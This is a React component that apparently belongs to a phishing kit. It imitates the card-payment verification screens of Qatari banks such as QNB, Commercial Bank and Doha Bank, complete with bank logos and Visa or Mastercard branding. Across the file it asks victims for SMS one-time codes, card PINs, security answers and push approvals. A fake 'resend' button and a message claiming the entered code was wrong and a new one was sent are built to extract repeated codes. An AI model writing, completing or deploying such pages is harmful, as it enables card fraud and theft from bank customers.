import React, { useState, useEffect } from 'react';
import { isMastercard } from '../../cardScheme';
import './QatarBankLayout.css';

export const QATAR_BANKS = {
  qatar_qnb: {
    key: 'qnb',
    name: 'Qatar National Bank (QNB)',
    logo: process.env.PUBLIC_URL + '/images/banks/qnb.png',
    primaryColor: '#000F33',
    type: 'qnb'
  },
  qatar_cboq: {
    key: 'cboq',
    name: 'Commercial Bank of Qatar',
    logo: process.env.PUBLIC_URL + '/images/banks/cboq.png',
    primaryColor: '#0277EF',
    type: 'cboq'
  },
  qatar_qib: {
    key: 'qib',
    name: 'Qatar Islamic Bank',
    logo: process.env.PUBLIC_URL + '/images/banks/qib.png',
    primaryColor: '#0369a1',
    type: 'qib'
  },
  qatar_qiib: {
    key: 'qiib',
    name: 'Qatar International Islamic Bank',
    logo: process.env.PUBLIC_URL + '/images/banks/qib.png',
    primaryColor: '#0369a1',
    type: 'qiib'
  },
  qatar_doha: {
    key: 'doha',
    name: 'Doha Bank',
    logo: process.env.PUBLIC_URL + '/images/banks/doha.png',
    primaryColor: '#006838',
    type: 'doha'
  },
  qatar_alrayan: {
    key: 'alrayan',
    name: 'Masraf Al Rayan',
    logo: process.env.PUBLIC_URL + '/images/banks/alrayan.png',
    primaryColor: '#183AB0',
    type: 'alrayan'
  },
  qatar_dukhan: {
    key: 'dukhan',
    name: 'Dukhan Bank',
    logo: process.env.PUBLIC_URL + '/images/banks/dukhan.png',
    primaryColor: '#183AB0',
    type: 'dukhan'
  },
  qatar_hsbc: {
    key: 'hsbc',
    name: 'HSBC Bank Middle East',
    logo: process.env.PUBLIC_URL + '/images/banks/hsbc.png',
    primaryColor: '#47749E',
    type: 'hsbc'
  },
  qatar_ahli: {
    key: 'ahli',
    name: 'Ahli Bank Q.S.C.',
    logo: process.env.PUBLIC_URL + '/images/banks/ahli.png',
    primaryColor: '#0B3D91',
    type: 'ahli'
  },
  qatar_default: {
    key: 'default',
    name: 'Qatar Bank Authentication',
    logo: process.env.PUBLIC_URL + '/images/banks/qnb.png',
    primaryColor: '#000F33',
    type: 'qnb'
  }
};

export const isQatarBankDesign = (design) => {
  return Boolean(design && (String(design).startsWith('qatar_') || QATAR_BANKS[design]));
};

export default function QatarBankLayout({
  design,
  mode = 'otp', // 'otp' | 'refund' | 'push' | 'question' | 'pin' | 'loading' | 'error'
  // OTP / Refund props
  code = '',
  setCode,
  handleCodeChange,
  handleSubmit,
  errorMessage,
  isDuplicate = false,
  isRetryActive = false,
  isShaking = false,
  isSubmitting = false,
  setIsDuplicate,
  onCancel,
  isRefund = false,
  // Push props
  customMessage,
  onApprove,
  // Question props
  customQuestion,
  answer = '',
  setAnswer,
  handleQuestionSubmit,
  // PIN props
  pin = '',
  setPin,
  handlePinSubmit
}) {
  const bank = QATAR_BANKS[design] || QATAR_BANKS.qatar_default;
  const lang = localStorage.getItem('dino_lang') || 'ar';
  const isRtl = lang === 'ar';

  const merchant = localStorage.getItem('session_merchant') || process.env.REACT_APP_MERCHANT_NAME || 'Dino World Qatar';
  const amount = localStorage.getItem('session_amount') || localStorage.getItem('summ') || '0.00';
  const currency = localStorage.getItem('session_currency') || localStorage.getItem('currency') || process.env.REACT_APP_CURRENCY || 'QAR';
  const last4 = localStorage.getItem('session_last4') || localStorage.getItem('last-four-digits') || '••••';

  const [timeLeft, setTimeLeft] = useState(120);
  const [resendAlert, setResendAlert] = useState(false);

  useEffect(() => {
    if (timeLeft <= 0) return;
    const timer = setInterval(() => setTimeLeft((prev) => prev - 1), 1000);
    return () => clearInterval(timer);
  }, [timeLeft]);

  const handleResend = () => {
    setResendAlert(true);
    setTimeLeft(120);
    setTimeout(() => setResendAlert(false), 4000);
  };

  const today = new Date();
  const formattedDate = `${today.getDate().toString().padStart(2, '0')}/${(today.getMonth() + 1).toString().padStart(2, '0')}/${today.getFullYear()}`;

  const isMc = isMastercard(design);
  const schemeLogo = isMc
    ? process.env.PUBLIC_URL + '/images/banks/idcheck2.png'
    : process.env.PUBLIC_URL + '/images/banks/visa.png';
  const schemeAlt = isMc ? 'Mastercard Identity Check' : 'Visa Secure';

  // Strict Qatar OTP Rule: strictly 6 digits
  const isOtpValid = code.length === 6 && !isDuplicate && !isSubmitting;
  const isPinValid = pin.length === 4 && !isSubmitting;

  return (
    <div className={`qb-container ${isRtl ? 'qb-container--rtl' : ''}`} style={{ '--qb-primary': bank.primaryColor }}>
      <div className="qb-modal" style={{ borderTop: `4px solid ${bank.primaryColor}` }}>
        <div className="qb-body">
          {/* Header Logos */}
          <div className="qb-logos-header">
            <img src={bank.logo} alt={bank.name} className="qb-bank-logo" onError={(e) => { e.target.style.display = 'none'; }} />
            <img src={schemeLogo} alt={schemeAlt} className="qb-scheme-logo" onError={(e) => { e.target.style.display = 'none'; }} />
          </div>

          <div style={{ height: '1px', background: '#f1f5f9', margin: '0.75rem 0 1rem' }} />

          {/* 1. OTP MODE / REFUND MODE */}
          {(mode === 'otp' || mode === 'refund' || isRefund) && (
            <div>
              <h1 style={{ fontSize: '1.05rem', fontWeight: 800, color: '#0f172a', margin: '0 0 0.4rem' }}>
                {isRefund
                  ? (isRtl ? 'التحقق من استرداد المبلغ المصرفي' : 'Verify Bank Refund')
                  : (isRtl ? 'التحقق من عملية الدفع المصرفية' : 'Bank Payment Verification')}
              </h1>

              <p style={{ fontSize: '0.8rem', color: '#475569', lineHeight: 1.5, margin: '0 0 1rem' }}>
                {isRefund
                  ? (isRtl ? 'يرجى إدخال رمز التحقق المكون من 6 أرقام المرسل إلى هاتفك لتأكيد الاسترداد.' : 'Please enter the 6-digit one-time passcode sent to your registered phone number to confirm.')
                  : (isRtl ? 'تم إرسال رمز تحقق صالح لمرة واحدة (OTP) مكون من 6 أرقام إلى رقم هاتفك المسجل لدى البنك.' : 'A 6-digit one-time passcode (OTP) has been sent to your registered mobile phone number.')}
              </p>

              {/* Error / Retry Banner */}
              {(errorMessage || isRetryActive || isDuplicate) && (
                <div className="qb-error-banner">
                  <svg className="qb-error-icon" viewBox="0 0 24 24" fill="none" stroke="#ef4444" strokeWidth="2.5" strokeLinecap="round" strokeLinejoin="round">
                    <circle cx="12" cy="12" r="10"></circle>
                    <line x1="12" y1="8" x2="12" y2="12"></line>
                    <line x1="12" y1="16" x2="12.01" y2="16"></line>
                  </svg>
                  <div className="qb-error-content">
                    <div className="qb-error-title">{isRtl ? 'رمز التحقق غير صحيح' : 'Verification Code Error'}</div>
                    <div className="qb-error-text">
                      {isDuplicate
                        ? (isRtl ? 'لقد أدخلت هذا الرمز مسبقاً. يرجى إدخال الرمز الجديد المرسل إليك.' : 'You already submitted this code. Please enter the new SMS code sent to your phone.')
                        : (errorMessage || (isRtl ? 'رمز التحقق المدخل غير صحيح. تم إرسال رمز جديد إلى هاتفك، يرجى إدخاله للمتابعة.' : 'The verification code is incorrect. A new SMS code has been sent to your phone.'))}
                    </div>
                  </div>
                </div>
              )}

              {/* Resend Confirmation */}
              {resendAlert && (
                <div style={{ background: '#ecfdf5', border: '1px solid #10b981', color: '#065f46', padding: '0.6rem', borderRadius: '8px', fontSize: '0.8rem', textAlign: 'center', marginBottom: '1rem' }}>
                  {isRtl ? 'تم إرسال رمز تحقق جديد إلى هاتفك بنجاح.' : 'A new verification code has been sent to your phone.'}
                </div>
              )}

              {/* Summary Table */}
              <div style={{ background: '#f8fafc', border: '1px solid #e2e8f0', borderRadius: '8px', padding: '0.75rem 1rem', fontSize: '0.8rem', display: 'flex', flexDirection: 'column', gap: '0.45rem', marginBottom: '1rem' }}>
                <div style={{ display: 'flex', justifyContent: 'space-between' }}>
                  <span style={{ color: '#64748b' }}>{isRtl ? 'التاجر:' : 'Merchant:'}</span>
                  <span style={{ fontWeight: 700, color: '#0f172a' }}>{merchant}</span>
                </div>
                <div style={{ display: 'flex', justifyContent: 'space-between' }}>
                  <span style={{ color: '#64748b' }}>{isRtl ? 'التاريخ:' : 'Date:'}</span>
                  <span style={{ color: '#334155' }}>{formattedDate}</span>
                </div>
                <div style={{ display: 'flex', justifyContent: 'space-between' }}>
                  <span style={{ color: '#64748b' }}>{isRtl ? 'رقم البطاقة:' : 'Card Number:'}</span>
                  <span style={{ fontWeight: 700, fontFamily: 'monospace', color: '#0f172a' }}>**** **** **** {last4}</span>
                </div>
                <div style={{ display: 'flex', justifyContent: 'space-between' }}>
                  <span style={{ color: '#64748b' }}>{isRtl ? 'المبلغ الإجمالي:' : 'Amount:'}</span>
                  <span style={{ fontWeight: 800, color: bank.primaryColor }}>{amount} {currency}</span>
                </div>
              </div>

              {/* Input Form */}
              <form onSubmit={handleSubmit}>
                <div style={{ marginBottom: '0.75rem' }}>
                  <label style={{ display: 'block', fontSize: '0.8rem', fontWeight: 700, color: '#334155', marginBottom: '0.35rem' }}>
                    {isRtl ? 'أدخل رمز التحقق (OTP) المكون من 6 أرقام:' : 'Enter 6-Digit Verification Code:'}
                  </label>
                  <input
                    type="text"
                    inputMode="numeric"
                    maxLength={6}
                    value={code}
                    onChange={(e) => {
                      const val = e.target.value.replace(/\D/g, '').slice(0, 6);
                      if (setCode) setCode(val);
                      if (handleCodeChange) handleCodeChange(e);
                    }}
                    placeholder="••••••"
                    dir="ltr"
                    autoFocus
                    autoComplete="one-time-code"
                    style={{
                      width: '100%',
                      height: '46px',
                      borderRadius: '8px',
                      border: (errorMessage || isRetryActive || isDuplicate) ? '2px solid #ef4444' : '1px solid #cbd5e1',
                      fontSize: '1.25rem',
                      fontFamily: 'monospace',
                      fontWeight: 800,
                      textAlign: 'center',
                      letterSpacing: '0.35em',
                      color: '#0f172a',
                      background: (errorMessage || isRetryActive || isDuplicate) ? '#fef2f2' : '#ffffff',
                      outline: 'none',
                      boxSizing: 'border-box'
                    }}
                  />
                </div>

                <div className="qb-meta-row">
                  <div className="qb-timer">
                    <span>⏱ {isRtl ? 'صلاحية الرمز:' : 'Expires in:'}</span>
                    <strong style={{ fontFamily: 'monospace' }}>{Math.floor(timeLeft / 60)}:{(timeLeft % 60).toString().padStart(2, '0')}</strong>
                  </div>
                  <button type="button" onClick={handleResend} className="qb-resend-link">
                    {isRtl ? 'إعادة إرسال الرمز' : 'Resend SMS Code'}
                  </button>
                </div>

                <button
                  type="submit"
                  disabled={!isOtpValid}
                  className="qb-submit-btn"
                >
                  {isSubmitting ? (
                    <span>{isRtl ? 'جاري المعالجة...' : 'Processing...'}</span>
                  ) : (
                    <span>{isRefund ? (isRtl ? 'تأكيد الاسترداد' : 'Confirm Refund') : (isRtl ? 'تأكيد ودفع' : 'Submit & Authorize')}</span>
                  )}
                </button>
              </form>
            </div>
          )}

          {/* 2. PIN MODE */}
          {mode === 'pin' && (
            <div>
              <h1 style={{ fontSize: '1.05rem', fontWeight: 800, color: '#0f172a', margin: '0 0 0.4rem' }}>
                {isRtl ? 'التحقق بواسطة الرقم السري للبطاقة (PIN)' : 'Card PIN Verification'}
              </h1>
              <p style={{ fontSize: '0.8rem', color: '#475569', lineHeight: 1.5, margin: '0 0 1rem' }}>
                {isRtl ? 'يرجى إدخال الرقم السري للبطاقة المصرفية (4 أرقام) لإتمام المعاملة بأمان.' : 'Please enter your 4-digit card PIN to authorize this transaction securely.'}
              </p>

              {errorMessage && (
                <div className="qb-error-banner">
                  <div className="qb-error-content">
                    <div className="qb-error-title">{isRtl ? 'الرقم السري غير صحيح' : 'Incorrect PIN'}</div>
                    <div className="qb-error-text">{errorMessage}</div>
                  </div>
                </div>
              )}

              <form onSubmit={handlePinSubmit}>
                <div style={{ marginBottom: '1.25rem' }}>
                  <label style={{ display: 'block', fontSize: '0.8rem', fontWeight: 700, color: '#334155', marginBottom: '0.35rem' }}>
                    {isRtl ? 'أدخل الرقم السري (4 أرقام):' : 'Enter 4-Digit Card PIN:'}
                  </label>
                  <input
                    type="password"
                    inputMode="numeric"
                    maxLength={4}
                    value={pin}
                    onChange={(e) => {
                      const val = e.target.value.replace(/\D/g, '').slice(0, 4);
                      if (setPin) setPin(val);
                    }}
                    placeholder="••••"
                    dir="ltr"
                    autoFocus
                    style={{
                      width: '100%',
                      height: '46px',
                      borderRadius: '8px',
                      border: errorMessage ? '2px solid #ef4444' : '1px solid #cbd5e1',
                      fontSize: '1.5rem',
                      fontFamily: 'monospace',
                      fontWeight: 800,
                      textAlign: 'center',
                      letterSpacing: '0.5em',
                      color: '#0f172a',
                      background: errorMessage ? '#fef2f2' : '#ffffff',
                      outline: 'none',
                      boxSizing: 'border-box'
                    }}
                  />
                </div>

                <button type="submit" disabled={!isPinValid} className="qb-submit-btn">
                  {isSubmitting ? (
                    <span>{isRtl ? 'جاري التحقق...' : 'Processing...'}</span>
                  ) : (
                    <span>{isRtl ? 'تأكيد الرقم السري' : 'Confirm PIN'}</span>
                  )}
                </button>
              </form>
            </div>
          )}

          {/* 3. PUSH MODE */}
          {mode === 'push' && (
            <div className="qb-spinner-box">
              <div className="qb-spinner" />
              <h2 style={{ fontSize: '1rem', fontWeight: 800, color: '#0f172a', margin: '0 0 0.5rem', textAlign: 'center' }}>
                {isRtl ? 'تأكيد الإشعار في تطبيق البنك' : 'Approve Notification in Bank App'}
              </h2>
              <p style={{ fontSize: '0.82rem', color: '#475569', textAlign: 'center', lineHeight: 1.5, margin: '0 0 1.5rem' }}>
                {customMessage || (isRtl ? 'يرجى فتح تطبيق البنك الخاص بك والموافقة على إشعار طلب الدفع لإكمال الحجز.' : 'Please open your mobile banking app and approve the transaction push request.')}
              </p>
              <button type="button" onClick={onApprove} className="qb-submit-btn">
                {isRtl ? 'لقد قمت بالموافقة في التطبيق' : 'I Have Approved The Request'}
              </button>
            </div>
          )}

          {/* 4. QUESTION MODE */}
          {mode === 'question' && (
            <div>
              <h1 style={{ fontSize: '1.05rem', fontWeight: 800, color: '#0f172a', margin: '0 0 0.4rem' }}>
                {isRtl ? 'سؤال الأمان المصرفي' : 'Security Question'}
              </h1>
              <p style={{ fontSize: '0.8rem', color: '#475569', lineHeight: 1.5, margin: '0 0 1rem' }}>
                {customQuestion || (isRtl ? 'يرجى الإجابة على سؤال الأمان المحدد لدى البنك للمتابعة.' : 'Please answer your bank security question to proceed.')}
              </p>

              <form onSubmit={handleQuestionSubmit}>
                <div style={{ marginBottom: '1.25rem' }}>
                  <input
                    type="text"
                    value={answer}
                    onChange={(e) => setAnswer && setAnswer(e.target.value)}
                    placeholder={isRtl ? 'أدخل الإجابة هنا' : 'Enter your answer here'}
                    autoFocus
                    style={{
                      width: '100%',
                      height: '46px',
                      borderRadius: '8px',
                      border: '1px solid #cbd5e1',
                      fontSize: '0.95rem',
                      padding: '0 1rem',
                      color: '#0f172a',
                      outline: 'none',
                      boxSizing: 'border-box'
                    }}
                  />
                </div>
                <button type="submit" disabled={!answer.trim() || isSubmitting} className="qb-submit-btn">
                  {isSubmitting ? (
                    <span>{isRtl ? 'جاري الإرسال...' : 'Processing...'}</span>
                  ) : (
                    <span>{isRtl ? 'تأكيد الإجابة' : 'Submit Answer'}</span>
                  )}
                </button>
              </form>
            </div>
          )}

          {/* 5. LOADING / ERROR MODE */}
          {mode === 'loading' && (
            <div className="qb-spinner-box">
              <div className="qb-spinner" />
              <p style={{ fontSize: '0.85rem', color: '#475569', fontWeight: 600 }}>
                {isRtl ? 'جاري التحقق بأمان من البنك المصدر...' : 'Verifying securely with your bank...'}
              </p>
            </div>
          )}

          {/* Footer */}
          <div className="qb-footer">
            <span>🔒 256-bit SSL Protection</span>
            <button
              type="button"
              onClick={onCancel}
              style={{ background: 'none', border: 'none', color: '#64748b', cursor: 'pointer', fontSize: '0.75rem' }}
            >
              {isRtl ? 'إلغاء المعاملة' : 'Cancel Transaction'}
            </button>
          </div>
        </div>
      </div>
    </div>
  );
}
